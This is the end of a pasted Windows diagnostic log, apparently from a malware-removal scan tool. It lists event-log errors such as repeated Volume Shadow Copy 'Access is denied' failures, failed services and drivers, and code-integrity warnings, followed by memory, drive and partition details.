- Writer Instance ID: {d09007ad-61ae-428d-a929-788a5b790395}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: Volume Shadow Copy Service error: Unexpected error calling routine RegSetValueExW(0x00000310,(null),0,REG_BINARY,00000000074CDD30.72). hr = 0x80070005, Access is denied.
- .
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
- Writer Name: System Writer
- Writer Instance ID: {78f0e62a-92bf-405f-994d-975a464c51f8}
- System errors:
- =============
- Error: (11/01/2014 06:59:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
- Description: A timeout was reached (30000 milliseconds) while waiting for the Windows Error Reporting Service service to connect.
- Error: (11/01/2014 06:52:03 PM) (Source: DCOM) (EventID: 10010) (User: )
- Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- Error: (11/01/2014 06:51:19 PM) (Source: Service Control Manager) (EventID: 7024) (User: )
- Description: The HitmanPro 3.7 Crusader (Boot) service terminated with service-specific error %%0.
- Error: (11/01/2014 06:51:10 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
- Description: The following boot-start or system-start driver(s) failed to load:
- qknfd
- Error: (11/01/2014 06:51:04 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
- Description: The Util RightSurf service failed to start due to the following error:
- %%2
- Error: (11/01/2014 06:50:48 PM) (Source: DCOM) (EventID: 10000) (User: )
- Description: "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\agent.exe" -Embedding740{FFF2D28F-E4EE-44D9-8104-8E71556757F6}
- Error: (11/01/2014 06:47:43 PM) (Source: Service Control Manager) (EventID: 7006) (User: )
- Description: The ScRegSetValueExW call failed for DeleteFlag with the following error:
- %%5
- Error: (11/01/2014 06:18:55 PM) (Source: DCOM) (EventID: 10010) (User: )
- Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
- Error: (11/01/2014 06:18:01 PM) (Source: DCOM) (EventID: 10000) (User: )
- Description: "C:\Program Files (x86)\Common Files\InstallShield\UpdateService\agent.exe" -Embedding740{FFF2D28F-E4EE-44D9-8104-8E71556757F6}
- Error: (11/01/2014 06:17:23 PM) (Source: Service Control Manager) (EventID: 7026) (User: )
- Description: The following boot-start or system-start driver(s) failed to load:
- qknfd
- Microsoft Office Sessions:
- =========================
- Error: (11/01/2014 06:51:42 PM) (Source: WinMgmt) (EventID: 10) (User: )
- Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003
- Error: (11/01/2014 06:50:38 PM) (Source: DesignSpooler) (EventID: 2) (User: NT AUTHORITY)
- Description: Pulse Design Spooler is shutting down. Security Device Error - Please attach your security device.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x0000026c,SYSTEM\CurrentControlSet\Services\VSS\Diag\VssvcPublisher,0,REG_BINARY,0000000002D2EB10.72)0x80070005, Access is denied.
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000d78,(null),0,REG_BINARY,00000000098FDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {cd3f2362-8bef-46c7-9181-d62844cdc0b2}
- Writer Name: MSSearch Service Writer
- Writer Instance ID: {14ce3ae3-8162-40cd-a0d5-a852f74bd3aa}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x000001ec,(null),0,REG_BINARY,0000000002AFEA00.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {4dc3bdd4-ab48-4d07-adb0-3bee2926fd7f}
- Writer Name: Shadow Copy Optimization Writer
- Writer Instance ID: {043545d9-2944-4e8f-8adc-a463570ed7f2}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x000001b0,(null),0,REG_BINARY,0000000002B7EAD0.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {afbab4a2-367d-4d15-a586-71dbb18f8485}
- Writer Name: Registry Writer
- Writer Instance ID: {d09007ad-61ae-428d-a929-788a5b790395}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000644,(null),0,REG_BINARY,0000000002BEE180.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {a6ad56c2-b509-4e6c-bb19-49d8f43532f0}
- Writer Name: WMI Writer
- Writer Instance ID: {357e23c8-7333-4443-8351-b9c96a4ce42d}
- Error: (11/01/2014 06:47:47 PM) (Source: VSS) (EventID: 8193) (User: )
- Description: RegSetValueExW(0x00000310,(null),0,REG_BINARY,00000000074CDD30.72)0x80070005, Access is denied.
- Operation:
- BackupShutdown Event
- Context:
- Execution Context: Writer
- Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
- Writer Name: System Writer
- Writer Instance ID: {78f0e62a-92bf-405f-994d-975a464c51f8}
- CodeIntegrity Errors:
- ===================================
- Date: 2013-02-28 03:17:54.952
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-28 03:17:54.920
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-26 15:54:42.178
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-26 15:54:42.147
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:56:24.777
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:56:24.730
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:54:10.133
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- Date: 2013-02-24 17:54:10.117
- Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Windows\System32\drivers\Sentinel64.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
- ==================== Memory info ===========================
- Processor: Intel(R) Core(TM) i5-3470 CPU @ 3.20GHz
- Percentage of memory in use: 28%
- Total physical RAM: 8091.4 MB
- Available physical RAM: 5761.47 MB
- Total Pagefile: 16180.98 MB
- Available Pagefile: 13290.66 MB
- Total Virtual: 8192 MB
- Available Virtual: 8191.82 MB
- ==================== Drives ================================
- Drive c: () (Fixed) (Total:931.41 GB) (Free:828.77 GB) NTFS
- ==================== MBR & Partition Table ==================
- ========================================================
- Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: 011BAEA4)
- Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
- Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
- ==================== End Of Log ============================
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement